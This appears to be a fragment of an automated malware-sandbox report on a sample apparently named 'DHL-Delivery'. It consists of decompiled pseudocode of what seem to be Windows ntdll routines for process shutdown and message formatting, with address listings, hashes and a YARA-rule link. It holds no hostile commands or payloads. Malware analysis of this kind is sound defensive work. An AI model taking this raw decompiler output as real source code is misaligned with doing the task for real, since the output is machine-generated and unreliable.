					memset(_t135 - 0x70, 0, _t107 << 2);
					_t46 = _t115 + 0x48; // 0x0
					E1E0F8F70(_t135 - 0x78,  *_t46);
					 *((intOrPtr*)(_t135 - 4)) = 1;
					_t117 =  *0x1e1d09c4; // 0x752c20
					_t106 = 0;
					E1E0FA920(0, _t117);
					 *((intOrPtr*)(_t135 - 4)) = 0xfffffffe;
					E1E0FB104();
				}
				goto L15;
			}



























                        0x1e0faf50
                        0x1e0faf52
                        0x1e0faf57
                        0x1e0faf5c
                        0x1e0faf63
                        0x1e0faf6d
                        0x1e0fb08f
                        0x1e0fb094
                        0x1e0fb094
                        0x1e0faf73
                        0x1e0faf79
                        0x1e0faf7c
                        0x1e0faf7f
                        0x1e0faf82
                        0x1e0faf89
                        0x1e146b44
                        0x1e146b44
                        0x1e0faf96
                        0x1e146b4f
                        0x1e146b69
                        0x1e146b6e
                        0x1e146b6e
                        0x1e0faf9f
                        0x1e0fafa4
                        0x1e0fafb2
                        0x1e0fb0d2
                        0x1e0fb0e2
                        0x1e0fb0e8
                        0x1e0fb0ea
                        0x1e0fb0ec
                        0x1e0fb0ee
                        0x1e0fb0f4
                        0x1e0fb0f4
                        0x1e0fafb8
                        0x1e0fafc0
                        0x1e0fafc2
                        0x1e0fafc3
                        0x1e0fafc3
                        0x1e0fafcf
                        0x1e146b76
                        0x1e146b79
                        0x1e146b80
                        0x1e146b83
                        0x1e146b8a
                        0x1e146b8d
                        0x1e146b8f
                        0x00000000
                        0x00000000
                        0x1e146b95
                        0x1e146b99
                        0x1e0fb06c
                        0x1e0fb06c
                        0x1e0fb072
                        0x1e0fb079
                        0x1e146bbe
                        0x1e146bc1
                        0x1e146bc7
                        0x1e146bcc
                        0x1e146bcc
                        0x1e146bc1
                        0x1e0fb07f
                        0x1e0fb083
                        0x1e0fb085
                        0x1e0fb085
                        0x1e0fb08a
                        0x00000000
                        0x1e0fb08a
                        0x1e0fafd5
                        0x1e0fafd5
                        0x1e0fafd7
                        0x1e0fafd9
                        0x1e0fafdc
                        0x1e0fafe5
                        0x1e0fafeb
                        0x1e0fafed
                        0x1e0fafed
                        0x1e0faff0
                        0x1e0faff3
                        0x1e0faff3
                        0x1e0faff6
                        0x1e0faff9
                        0x1e0faff9
                        0x1e0faffc
                        0x1e0fb001
                        0x1e0fb00c
                        0x1e0fb013
                        0x1e0fb018
                        0x1e0fb01e
                        0x1e0fb01e
                        0x1e0fb020
                        0x1e0fb026
                        0x1e0fb02b
                        0x1e0fb02e
                        0x1e0fb031
                        0x1e0fb035
                        0x1e0fb059
                        0x1e0fb059
                        0x1e0fb037
                        0x1e0fb038
                        0x1e0fb03c
                        0x1e0fb03f
                        0x1e0fb044
                        0x1e0fb04b
                        0x1e0fb04e
                        0x1e0fb04e
                        0x00000000
                        0x1e0fb001
                        0x1e0fb060
                        0x1e0fb066
                        0x1e0fb06a
                        0x1e0fb095
                        0x1e0fb09c
                        0x1e0fb0a1
                        0x1e0fb0a7
                        0x1e0fb0a9
                        0x1e0fb0af
                        0x1e0fb0b4
                        0x1e0fb0b7
                        0x1e0fb0bd
                        0x1e0fb0bf
                        0x1e0fb0c4
                        0x1e0fb0cb
                        0x1e0fb0cb
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: ,u$$$$$H+u$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                        • API String ID: 3446177414-72518636
                        • Opcode ID: 7c73592039a56482f68dc970b8b68a5ac7b6e6b1cac99eba38ba80c8e621b714
                        • Instruction ID: 92f710ced2a94428fd2bc55e608aa3d0d10cbee19f5e3f7cd891401a5c26be8e
                        • Opcode Fuzzy Hash: 7c73592039a56482f68dc970b8b68a5ac7b6e6b1cac99eba38ba80c8e621b714
                        • Instruction Fuzzy Hash: 4A51FF75A04295DFDB20CFA4C888B8DBBF2BF04358F248798D8116B295D734A9A5CF90
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E115EB0, Relevance: 13.3, Strings: 10, Instructions: 767UNIQUECrypto
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E1E115EB0(signed int _a4, intOrPtr _a8, char _a12, char _a16, char _a20, signed int* _a24, signed int _a28, unsigned int _a32, signed int* _a36, signed int* _a40) {
				signed int _v8;
				char _v14;
				char _v68;
				char _v70;
				char _v74;
				char _v76;
				signed int _v1680;
				char _v1681;
				char _v1682;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				char _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int* _v1736;
				signed int _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				signed int _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				signed int* _v1796;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t330;
				signed int _t331;
				void* _t332;
				signed int _t338;
				signed int _t339;
				signed int* _t342;
				void* _t344;
				signed int _t345;
				void* _t346;
				short _t347;
				signed int _t348;
				signed int _t351;
				void* _t358;
				short _t359;
				signed int _t361;
				void* _t365;
				void* _t367;
				signed char _t368;
				signed int _t369;
				void* _t371;
				void* _t372;
				signed int _t373;
				short _t374;
				signed short _t375;
				char _t377;
				char _t378;
				void* _t380;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				void* _t390;
				signed short _t391;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t400;
				intOrPtr* _t402;
				intOrPtr _t406;
				void* _t409;
				signed int _t410;
				signed int _t412;
				void* _t415;
				signed short* _t418;
				signed int _t419;
				signed short* _t424;
				void* _t426;
				void* _t427;
				signed int _t430;
				signed int _t432;
				signed int* _t434;
				signed int _t435;
				signed int _t436;
				char _t438;
				signed int _t440;
				signed int _t441;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				void* _t452;
				void* _t453;
				signed short* _t454;
				signed short* _t455;
				signed short* _t459;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				void* _t463;
				signed short _t465;
				signed int _t466;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed short* _t479;
				signed int _t480;
				void* _t481;
				intOrPtr _t482;
				signed int _t483;
				intOrPtr _t484;
				signed int _t485;
				void* _t486;
				signed int _t487;
				signed int _t489;
				void* _t490;
				signed int _t491;
				signed int _t492;
				void* _t493;
				void* _t494;
				void* _t495;
				short _t496;
				signed int _t498;
				signed int _t500;
				void* _t503;
				void* _t504;
				void* _t505;
				short* _t509;
				signed int _t510;
				signed int _t511;
				short* _t515;
				short* _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				void* _t520;

				_v8 =  *0x1e1d6360 ^ _t519;
				_v1704 = _v1704 & 0x00000000;
				_t330 = _a24;
				_t434 = _a40;
				_t510 = _a4;
				_v1752 = _t510;
				_v1692 = _t330;
				_v1796 = _a36;
				_v1736 = _t434;
				_a32 = _a32 >> 1;
				_v1760 = 0x25;
				_v1764 = 8;
				_v1768 = 0x30;
				_v1772 = 0x39;
				_v1756 = 0x21;
				_v1776 = 0x68;
				_v1780 = 0x77;
				_v1784 = 0x6c;
				_v1788 = 0xd;
				_v1792 = 0xa;
				_v1748 = 9;
				_v1744 = 0x20;
				_t491 = _a28;
				_v1728 = _t491;
				if(_t434 == 0) {
					L2:
					_t440 = _v1752;
					_t511 = _t491;
					_t492 = 0;
					_v1696 = _t511;
					_v1688 = _v1688 & 0;
					_t475 = _t440;
					_v1700 = 0;
					_v1724 = _t440;
					if(_a20 != 0 || _t330 == 0) {
						L4:
						_t441 = _a32;
						goto L5;
					} else {
						_t441 = _a32;
						if(_t434 != 0) {
							_t434[5] =  *_t330;
						}
						while(1) {
							L5:
							_t331 =  *_t475 & 0x0000ffff;
							if(_t331 == 0) {
								break;
							}
							_t475 = _t475 + 2;
							if(_t331 == _v1760) {
								_t445 =  *_t475 & 0x0000ffff;
								_v1740 = _t511;
								_push(0x30);
								if(_t445 - 0x31 > _v1764) {
									_pop(_t344);
									if(_t445 == _t344) {
										break;
									}
									if(_t445 == 0) {
										L70:
										_t332 = 0xc000000d;
										L20:
										return E1E1225C0(_t332, _t434, _v8 ^ _t519, _t475, _t492, _t511);
									}
									if(_t445 != 0x72) {
										if(_t445 != 0x6e) {
											if(_t445 != 0x74) {
												if(_t445 != 0x62) {
													if(_a12 == 0) {
														_t288 =  &_a32;
														 *_t288 = _a32 - 1;
														if( *_t288 < 0) {
															L175:
															if(_t434 != 0) {
																_t444 = _v1728;
																_t434[1] = _v1688;
																_t434[2] = _v1724 - _v1752 >> 1;
																_t338 = _v1700;
																_t434[3] = _t511;
																if(_t338 == 0) {
																	_t339 = _t338 | 0xffffffff;
																} else {
																	_t339 = _t338 - _t444 >> 1;
																}
																 *_t434 =  *_t434 | 0x00000001;
																_t434[4] = _t339;
															}
															L186:
															_t332 = 0x80000005;
															goto L20;
														}
														 *_t511 = _t445;
														_t441 = _a32;
														L153:
														_t511 = _t511 + 2;
														L154:
														_t475 = _t475 + 2;
														_v1680 = _t475;
														L50:
														_v1696 = _t511;
														if(_v1740 == 0) {
															L133:
															_t492 = 0;
															_t345 = 0;
															_v1700 = 0;
															L12:
															_v1688 = _t345;
															L13:
															_v1724 = _t475;
															if(_a8 == 0 || _a8 == 0xffffffff || _t345 < _a8) {
																continue;
															} else {
																L160:
																if(_t492 == 0) {
																	_t441 = _t441 - 2;
																	_a32 = _t441;
																	if(_t441 < 0) {
																		L173:
																		if(_t434 == 0) {
																			goto L186;
																		}
																		 *_t434 =  *_t434 | 0x00000002;
																		goto L175;
																	}
																	_t346 = 0xd;
																	 *_t511 = _t346;
																	_t515 = _t511 + 2;
																	_v1688 = _v1688 & 0x00000000;
																	_t347 = 0xa;
																	 *_t515 = _t347;
																	L183:
																	_t475 = _v1680;
																	_t492 = 0;
																	_t511 = _t515 + 2;
																	_v1700 = 0;
																	_v1696 = _t511;
																	continue;
																}
																_t446 = _t492;
																_t475 = 0x20;
																while(1) {
																	_t348 =  *_t446 & 0x0000ffff;
																	if(_t348 != _t475 && _t348 != _v1748) {
																		break;
																	}
																	_t446 = _t446 + 2;
																	if(_t446 != _t511) {
																		continue;
																	}
																	break;
																}
																if(_t492 <= _v1728) {
																	L171:
																	_t351 = _t446 - _t492 >> 1;
																	if(_t351 != 1) {
																		if(_t351 > 2) {
																			_a32 = _a32 + 0xfffffffe + _t351;
																		}
																		L180:
																		_v1688 = _t511 - _t446 >> 1;
																		L1E1266B0(_t492 + 4, _t446, (_t511 - _t446 >> 1) + (_t511 - _t446 >> 1));
																		_t441 = _a32;
																		_t520 = _t520 + 0xc;
																		_t358 = 0xd;
																		 *_t492 = _t358;
																		_t509 = _t492 + 2;
																		_t359 = 0xa;
																		 *_t509 = _t359;
																		_t515 = _t509 + _v1688 * 2;
																		goto L183;
																	}
																	_t303 =  &_a32;
																	 *_t303 = _a32 - _t351;
																	if( *_t303 >= 0) {
																		goto L180;
																	}
																	goto L173;
																}
																_t435 = _v1728;
																while(1) {
																	_t361 =  *(_t492 - 2) & 0x0000ffff;
																	if(_t361 != _v1744 && _t361 != _v1748) {
																		break;
																	}
																	_t492 = _t492 + 0xfffffffe;
																	if(_t492 > _t435) {
																		continue;
																	}
																	break;
																}
																_t434 = _v1736;
																_v1700 = _t492;
																goto L171;
															}
														}
														_v1688 = _v1688 + (_t511 - _v1740 >> 1);
														_t345 = _v1688;
														goto L13;
													}
													_t441 = _a32 - 2;
													_a32 = _t441;
													if(_t441 < 0) {
														goto L175;
													}
													_t365 = 0x25;
													 *_t511 = _t365;
													 *(_t511 + 2) =  *_t475;
													_t511 = _t511 + 4;
													goto L154;
												}
												_t441 = _a32 - 1;
												_a32 = _t441;
												if(_t441 < 0) {
													goto L175;
												}
												_push(0x20);
												L144:
												_t492 = _t511;
												_pop(_t367);
												_v1700 = _t492;
												 *_t511 = _t367;
												goto L153;
											}
											_t441 = _a32 - 1;
											_a32 = _t441;
											if(_t441 < 0) {
												goto L175;
											}
											_t368 = _v1688;
											if((_t368 & 0x00000007) == 0) {
												_t494 = 8;
												_t369 = _t368 + _t494;
											} else {
												_t369 = _t368 + 0x00000007 & 0xfffffff8;
											}
											_v1688 = _t369;
											_push(9);
											goto L144;
										}
										_t371 = 2;
										_t441 = _a32 - _t371;
										_a32 = _t441;
										if(_t441 < 0) {
											goto L175;
										}
										_t495 = 0xd;
										 *_t511 = _t495;
										_t516 = _t511 + _t371;
										_t496 = 0xa;
										 *_t516 = _t496;
										_t511 = _t516 + _t371;
										_t475 = _t475 + _t371;
										L132:
										_v1696 = _t511;
										_v1680 = _t475;
										goto L133;
									}
									_t441 = _a32 - 1;
									_a32 = _t441;
									if(_t441 < 0) {
										goto L175;
									}
									_t372 = 0xd;
									 *_t511 = _t372;
									_t511 = _t511 + 2;
									_t475 = _t475 + 2;
									goto L132;
								}
								_t479 = _t475 + 2;
								_pop(_t452);
								_v1680 = _t479;
								_t498 = _t445 - _t452;
								_t480 =  *_t479 & 0x0000ffff;
								_t373 = _t480;
								if(_t480 >= _t452) {
									_t453 = 0x39;
									_t373 = _t480;
									_t454 = _v1680;
									if(_t480 > _t453) {
										L31:
										_v1712 = _v1712 & 0x00000000;
										_v1720 = _t498;
										_t475 = 0x21;
										_v1732 = _t498 - 1;
										if(_t373 == _t475) {
											_t455 =  &(_t454[1]);
											_v1682 = 0;
											_t374 = 0x25;
											_v76 = _t374;
											_t492 =  &_v74;
											_t375 =  *_t455 & 0x0000ffff;
											_t475 = _t492;
											_v1708 = _t492;
											_v1680 = _t455;
											if(_t375 == _v1756) {
												L79:
												_v1680 =  &(_t455[1]);
												_t457 =  &_v68;
												 *_t492 = 0;
												_t377 = 0;
												_v1681 = 0;
												if( &_v68 > _t475) {
													L88:
													_t378 = _v1682;
													L33:
													if(_a12 != 0) {
														if(_t378 == 1) {
															L99:
															_t475 = _a32;
															_t380 = E1E116392(_t457, _t511, _a32,  &_v1716, 0, 0, L"%%%u", _v1720);
															_t520 = _t520 + 0x1c;
															L47:
															if(_t380 < 0) {
																goto L175;
															}
															_t383 = _v1716 - _t511 >> 1;
															_t441 = _a32 - _t383;
															_a32 = _t441;
															if(_t441 < 0) {
																goto L175;
															}
															_t492 = _v1700;
															_t511 = _t511 + _t383 * 2;
															_t475 = _v1680;
															goto L50;
														}
														_t457 = L"%s";
														_t384 =  &_v76;
														while(1) {
															_t481 =  *_t384;
															if(_t481 !=  *_t457) {
																break;
															}
															if(_t481 == 0) {
																L95:
																_t385 = 0;
																L97:
																if(_t385 == 0) {
																	goto L99;
																}
																_t475 = _a32;
																_push( &_v74);
																_t380 = E1E116392(_t457, _t511, _a32,  &_v1716, 0, 0, L"%%%u!%s!", _v1720);
																_t520 = _t520 + 0x20;
																goto L47;
															}
															_t482 =  *((intOrPtr*)(_t384 + 2));
															_t191 =  &(_t457[2]); // 0x73
															if(_t482 !=  *_t191) {
																break;
															}
															_t384 = _t384 + 4;
															_t457 =  &(_t457[4]);
															if(_t482 != 0) {
																continue;
															}
															goto L95;
														}
														asm("sbb eax, eax");
														_t385 = _t384 | 0x00000001;
														goto L97;
													}
													if(_v1692 == 0 || _v1732 + _v1712 >= 0xc8) {
														goto L70;
													} else {
														if(_a16 != 0) {
															_t459 = _t492 - 2;
															_t483 =  *_t459 & 0x0000ffff;
															_t390 = 0x63;
															if(_t483 != _t390) {
																L105:
																_t391 = 0x73;
																if(_t483 != _t391) {
																	L112:
																	if(_t483 == 0x53) {
																		L115:
																		 *_t459 = _t391;
																		goto L37;
																	}
																	if(_t483 != 0x43) {
																		goto L37;
																	}
																	_t391 = 0x63;
																	goto L115;
																}
																_t410 =  *(_t492 - 4) & 0x0000ffff;
																_t503 = 0x68;
																if(_t410 == _t503) {
																	L111:
																	_t391 = 0x73;
																	goto L112;
																}
																_t504 = 0x77;
																if(_t410 == _t504) {
																	goto L111;
																}
																_t505 = 0x6c;
																if(_t410 == _t505) {
																	goto L111;
																}
																_push(L"hs");
																L110:
																_t486 = 3;
																E1E1748FE(_t459, _t486);
																goto L37;
															}
															_t412 =  *(_t492 - 4) & 0x0000ffff;
															if(_t412 == _v1776 || _t412 == _v1780 || _t412 == _v1784) {
																goto L105;
															} else {
																_push(L"hc");
																goto L110;
															}
														}
														L37:
														_t500 = _v1732;
														_t460 = _v1704;
														if(_t500 < _t460) {
															L44:
															_t461 =  *(_t519 + _t500 * 8 - 0x688);
															_t484 = 0;
															_t392 = _v1712;
															_v1720 = _t461;
															_v1708 = _t461;
															if(_t392 != 0) {
																if(_a20 == 0) {
																	_t393 = _v1692;
																	 *_t393 =  *_t393 + 4;
																	_t492 =  *( *_t393 - 4);
																	_t392 = _v1712;
																} else {
																	_t436 = _v1704;
																	 *(_t519 + _t436 * 8 - 0x684) =  *(_t519 + _t436 * 8 - 0x684) & 0;
																	_t492 =  *_v1692;
																	 *(_t519 + _t436 * 8 - 0x688) = _t492;
																	_v1692 = _v1692 + 4;
																	_v1704 = _t436 + 1;
																	_t434 = _v1736;
																}
																if(_t392 > 1) {
																	_t400 = _v1704;
																	_t462 = _t400;
																	_v1704 = _t400 + 1;
																	_t402 = _v1692;
																	if(_a20 == _t484) {
																		 *_t402 =  *_t402 + 4;
																		 *(_t519 + _t462 * 8 - 0x684) =  *(_t519 + _t462 * 8 - 0x684) & 0x00000000;
																		_t484 =  *((intOrPtr*)( *_t402 - 4));
																	} else {
																		_t484 =  *_t402;
																		 *(_t519 + _t462 * 8 - 0x684) =  *(_t519 + _t462 * 8 - 0x684) & 0x00000000;
																		_v1692 = _t402 + 4;
																	}
																	 *((intOrPtr*)(_t519 + _t462 * 8 - 0x688)) = _t484;
																	_t461 = _v1720;
																}
															}
															_push(_t484);
															_t475 = _a32;
															_push(_t492);
															if(_v1681 != 0) {
																_push( *((intOrPtr*)(_t519 + _v1732 * 8 - 0x684)));
																_t380 = E1E116392(_t461, _t511, _t475,  &_v1716, 0, 0,  &_v76,  *((intOrPtr*)(_t519 + _v1732 * 8 - 0x688)));
																_t520 = _t520 + 0x28;
															} else {
																_t380 = E1E116392(_t461, _t511, _t475,  &_v1716, 0, 0,  &_v76, _t461);
																_t520 = _t520 + 0x24;
															}
															goto L47;
														}
														_t438 = _v1681;
														_t517 = _v1692;
														do {
															_t86 = _t460 + 1; // 0x1
															_t485 = _t86;
															_t406 =  *_t517;
															if(_a20 == 0) {
																if(_t438 != 0) {
																	_t205 = _t406 + 8; // 0x7b
																	_t463 = _t205;
																	 *_t517 = _t463;
																	_t518 = _v1704;
																	 *((intOrPtr*)(_t519 + _t518 * 8 - 0x688)) =  *((intOrPtr*)(_t463 - 8));
																	_t517 = _v1692;
																	 *((intOrPtr*)(_t519 + _t518 * 8 - 0x684)) =  *((intOrPtr*)(_t463 - 4));
																	goto L42;
																}
																_t409 = _t406 + 4;
																 *(_t519 + _t460 * 8 - 0x684) =  *(_t519 + _t460 * 8 - 0x684) & 0x00000000;
																 *_t517 = _t409;
																_t406 =  *((intOrPtr*)(_t409 - 4));
																L41:
																 *((intOrPtr*)(_t519 + _t460 * 8 - 0x688)) = _t406;
																goto L42;
															}
															 *(_t519 + _t460 * 8 - 0x684) =  *(_t519 + _t460 * 8 - 0x684) & 0x00000000;
															_t517 = _t517 + 4;
															_v1692 = _t517;
															goto L41;
															L42:
															_t460 = _t485;
															_v1704 = _t460;
														} while (_t485 <= _t500);
														_t511 = _v1696;
														_t434 = _v1736;
														_v1704 = _t485;
														goto L44;
													}
												}
												_t457 =  &_v70;
												while(_t377 == 0) {
													if( *((short*)(_t457 - 4)) == 0x49 &&  *((short*)(_t457 - 2)) == 0x36 &&  *_t457 == 0x34) {
														_v1681 = 1;
													}
													_t457 =  &(_t457[2]);
													if( &(_t457[2]) <= _t492) {
														_t377 = _v1681;
														continue;
													} else {
														goto L88;
													}
												}
												goto L88;
											}
											_t465 = _t375;
											while(_t465 != 0 && _t492 <  &_v14) {
												_t415 = 0x2a;
												_t487 = _t465 & 0x0000ffff;
												if(_t465 != _t415) {
													L77:
													 *_v1708 = _t487;
													_t475 = _t492 + 2;
													_t492 = _t475;
													_t418 = _v1680 + 2;
													_v1708 = _t475;
													_v1680 = _t418;
													_t419 =  *_t418 & 0x0000ffff;
													_t465 = _t419;
													if(_t419 != _v1756) {
														continue;
													}
													_t455 = _v1680;
													goto L79;
												}
												_t466 = _v1712;
												_v1712 = _t466 + 1;
												_t475 = 0x2a;
												if(_t466 > 1) {
													goto L70;
												}
												goto L77;
											}
											goto L70;
										}
										_push(_t454);
										_push(_t454);
										_t457 =  &_v76;
										E1E1162DB( &_v76, _t454,  &_v1708);
										_t492 = _v1708;
										_t378 = 1;
										_v1681 = 0;
										goto L33;
									}
									_t454 =  &(_t454[1]);
									_v1680 = _t454;
									_t498 = _t498 * 0xa + _t480 + 0xffffffd0;
									_t489 =  *_t454 & 0x0000ffff;
									_t373 = _t489;
									if(_t489 < _v1768 || _t489 > _v1772) {
										goto L31;
									} else {
										_t424 = _v1680 + 2;
										_v1680 = _t424;
										_t490 = 0x30;
										_t498 = _t489 + 0xffffffd0 + _t498 * 0xa;
										_t469 =  *_t424 & 0x0000ffff;
										_t373 = _t469;
										if(_t469 < _t490) {
											goto L30;
										}
										_t475 = 0x39;
										if(_t469 > _t475) {
											goto L30;
										}
										goto L70;
									}
								}
								L30:
								_t454 = _v1680;
								goto L31;
							}
							_v1680 = _t475;
							if(_t331 == _v1788 || _t331 == _v1792) {
								_t493 = 0xa;
								_t492 = 0xd;
								if(_t331 == _t493) {
									if( *_t475 == _t492) {
										L24:
										_t475 = _t475 + 2;
										_v1680 = _t475;
										L25:
										if(_a8 != 0) {
											_t492 = _t511;
											_v1700 = _t492;
											_t331 = 0x20;
											goto L9;
										}
										_t441 = _t441 - 2;
										_a32 = _t441;
										if(_t441 < 0) {
											goto L175;
										}
										 *_t511 = _t492;
										_t492 = 0;
										_t426 = 0xa;
										 *(_t511 + 2) = _t426;
										_t511 = _t511 + 4;
										_v1688 = _v1688 & 0;
										_v1696 = _t511;
										_v1700 = 0;
										_v1724 = _t475;
										continue;
									}
								}
								if(_t331 != _t492) {
									goto L25;
								}
								_t427 = 0xa;
								if( *_t475 != _t427) {
									goto L25;
								}
								goto L24;
							} else {
								L9:
								_t441 = _t441 - 1;
								_a32 = _t441;
								if(_t441 < 0) {
									goto L175;
								} else {
									if(_t331 == _v1744) {
										_t492 = _t511;
										_v1700 = _t492;
									}
									 *_t511 = _t331;
									_t511 = _t511 + 2;
									_v1696 = _t511;
									_t345 = _v1688 + 1;
									goto L12;
								}
							}
						}
						if(_a32 < 1) {
							goto L175;
						}
						 *_t511 = 0;
						_t342 = _v1796;
						if(_t342 != 0) {
							 *_t342 = _t511;
						}
						_t332 = 0;
						goto L20;
					}
				}
				_t470 =  *_t434;
				if((_t470 & 0x00000001) != 0) {
					_t471 = _t470 & 0xfffffffe;
					_t475 = _t434[3];
					 *_t434 = _t471;
					_t430 = _t510 + _t434[2] * 2;
					_v1680 = _t430;
					_t511 = _t491 + _t475 * 2;
					_v1724 = _t430;
					_v1688 = _t434[1];
					_t432 = _t434[4];
					_v1696 = _t511;
					if(_t432 != 0xffffffff) {
						_t492 = _t491 + _t432 * 2;
					} else {
						_t492 = 0;
					}
					_a32 = _a32 - _t475;
					_v1700 = _t492;
					if(_a20 == 0) {
						_t475 = _v1692;
						if(_t475 != 0) {
							 *_t475 = _t434[5];
							_t471 =  *_t434;
						}
					}
					if((_t471 & 0x00000002) == 0) {
						_t475 = _v1680;
						goto L4;
					} else {
						 *_t434 = _t471 & 0xfffffffd;
						_t441 = _a32;
						goto L160;
					}
				}
				goto L2;
			}

















































































































































                        0x1e115ec2
                        0x1e115ecb
                        0x1e115ed2
                        0x1e115ed8
                        0x1e115edb
                        0x1e115ee0
                        0x1e115ee6
                        0x1e115eec
                        0x1e115ef2
                        0x1e115ef8
                        0x1e115efb
                        0x1e115f05
                        0x1e115f0f
                        0x1e115f19
                        0x1e115f23
                        0x1e115f2d
                        0x1e115f37
                        0x1e115f41
                        0x1e115f4b
                        0x1e115f55
                        0x1e115f5f
                        0x1e115f69
                        0x1e115f73
                        0x1e115f76
                        0x1e115f7e
                        0x1e115f8b
                        0x1e115f8b
                        0x1e115f91
                        0x1e115f93
                        0x1e115f95
                        0x1e115f9b
                        0x1e115fa1
                        0x1e115fa7
                        0x1e115fad
                        0x1e115fb3
                        0x1e115fbd
                        0x1e115fbd
                        0x00000000
                        0x1e1162a9
                        0x1e1162a9
                        0x1e1162ae
                        0x1e1162b6
                        0x1e1162b6
                        0x1e115fc0
                        0x1e115fc0
                        0x1e115fc0
                        0x1e115fc6
                        0x00000000
                        0x00000000
                        0x1e115fc8
                        0x1e115fd2
                        0x1e1160e4
                        0x1e1160e7
                        0x1e1160ed
                        0x1e1160f9
                        0x1e152b08
                        0x1e152b0c
                        0x00000000
                        0x00000000
                        0x1e152b15
                        0x1e1527e9
                        0x1e1527e9
                        0x1e11606a
                        0x1e11607a
                        0x1e11607a
                        0x1e152b1e
                        0x1e152b6d
                        0x1e152b85
                        0x1e152bca
                        0x1e152be1
                        0x1e152c04
                        0x1e152c04
                        0x1e152c08
                        0x1e152ccd
                        0x1e152ccf
                        0x1e152cdb
                        0x1e152ce3
                        0x1e152cf4
                        0x1e152cf7
                        0x1e152cff
                        0x1e152d04
                        0x1e152d9a
                        0x1e152d0a
                        0x1e152d0c
                        0x1e152d0c
                        0x1e152d9d
                        0x1e152da0
                        0x1e152da0
                        0x1e152da3
                        0x1e152da3
                        0x00000000
                        0x1e152da3
                        0x1e152c0e
                        0x1e152c11
                        0x1e152c14
                        0x1e152c14
                        0x1e152c17
                        0x1e152c17
                        0x1e152c1a
                        0x1e11627b
                        0x1e116282
                        0x1e116288
                        0x1e152b5b
                        0x1e152b5b
                        0x1e152b5d
                        0x1e152b5f
                        0x1e116020
                        0x1e116020
                        0x1e116026
                        0x1e11602a
                        0x1e116030
                        0x00000000
                        0x1e152c56
                        0x1e152c56
                        0x1e152c58
                        0x1e152d5c
                        0x1e152d5f
                        0x1e152d62
                        0x1e152cc2
                        0x1e152cc4
                        0x00000000
                        0x00000000
                        0x1e152cca
                        0x00000000
                        0x1e152cca
                        0x1e152d6a
                        0x1e152d6b
                        0x1e152d6e
                        0x1e152d71
                        0x1e152d7a
                        0x1e152d7b
                        0x1e152d7e
                        0x1e152d7e
                        0x1e152d84
                        0x1e152d86
                        0x1e152d89
                        0x1e152d8f
                        0x00000000
                        0x1e152d8f
                        0x1e152c60
                        0x1e152c62
                        0x1e152c63
                        0x1e152c63
                        0x1e152c69
                        0x00000000
                        0x00000000
                        0x1e152c74
                        0x1e152c79
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152c79
                        0x1e152c81
                        0x1e152cb2
                        0x1e152cb6
                        0x1e152cbb
                        0x1e152d16
                        0x1e152d20
                        0x1e152d20
                        0x1e152d23
                        0x1e152d29
                        0x1e152d37
                        0x1e152d3c
                        0x1e152d3f
                        0x1e152d44
                        0x1e152d45
                        0x1e152d48
                        0x1e152d4d
                        0x1e152d4e
                        0x1e152d57
                        0x00000000
                        0x1e152d57
                        0x1e152cbd
                        0x1e152cbd
                        0x1e152cc0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152cc0
                        0x1e152c83
                        0x1e152c89
                        0x1e152c89
                        0x1e152c94
                        0x00000000
                        0x00000000
                        0x1e152c9f
                        0x1e152ca4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e152ca4
                        0x1e152ca6
                        0x1e152cac
                        0x00000000
                        0x1e152cac
                        0x1e116030
                        0x1e116298
                        0x1e11629e
                        0x00000000
                        0x1e11629e
                        0x1e152be6
                        0x1e152be9
                        0x1e152bec
                        0x00000000
                        0x00000000
                        0x1e152bf4
                        0x1e152bf5
                        0x1e152bfb
                        0x1e152bff
                        0x00000000
                        0x1e152bff
                        0x1e152bcf
                        0x1e152bd2
                        0x1e152bd5
                        0x00000000
                        0x00000000
                        0x1e152bb7
                        0x1e152bb9
                        0x1e152bb9
                        0x1e152bbb
                        0x1e152bbc
                        0x1e152bc2
                        0x00000000
                        0x1e152bc2
                        0x1e152b8a
                        0x1e152b8d
                        0x1e152b90
                        0x00000000
                        0x00000000
                        0x1e152b96
                        0x1e152b9e
                        0x1e152baa
                        0x1e152bab
                        0x1e152ba0
                        0x1e152ba3
                        0x1e152ba3
                        0x1e152bad
                        0x1e152bb3
                        0x00000000
                        0x1e152bb3
                        0x1e152b74
                        0x1e152b75
                        0x1e152b77
                        0x1e152b7a
                        0x00000000
                        0x00000000
                        0x1e152b3f
                        0x1e152b40
                        0x1e152b43
                        0x1e152b47
                        0x1e152b48
                        0x1e152b4b
                        0x1e152b4d
                        0x1e152b4f
                        0x1e152b4f
                        0x1e152b55
                        0x00000000
                        0x1e152b55
                        0x1e152b23
                        0x1e152b26
                        0x1e152b29
                        0x00000000
                        0x00000000
                        0x1e152b31
                        0x1e152b32
                        0x1e152b35
                        0x1e152b38
                        0x00000000
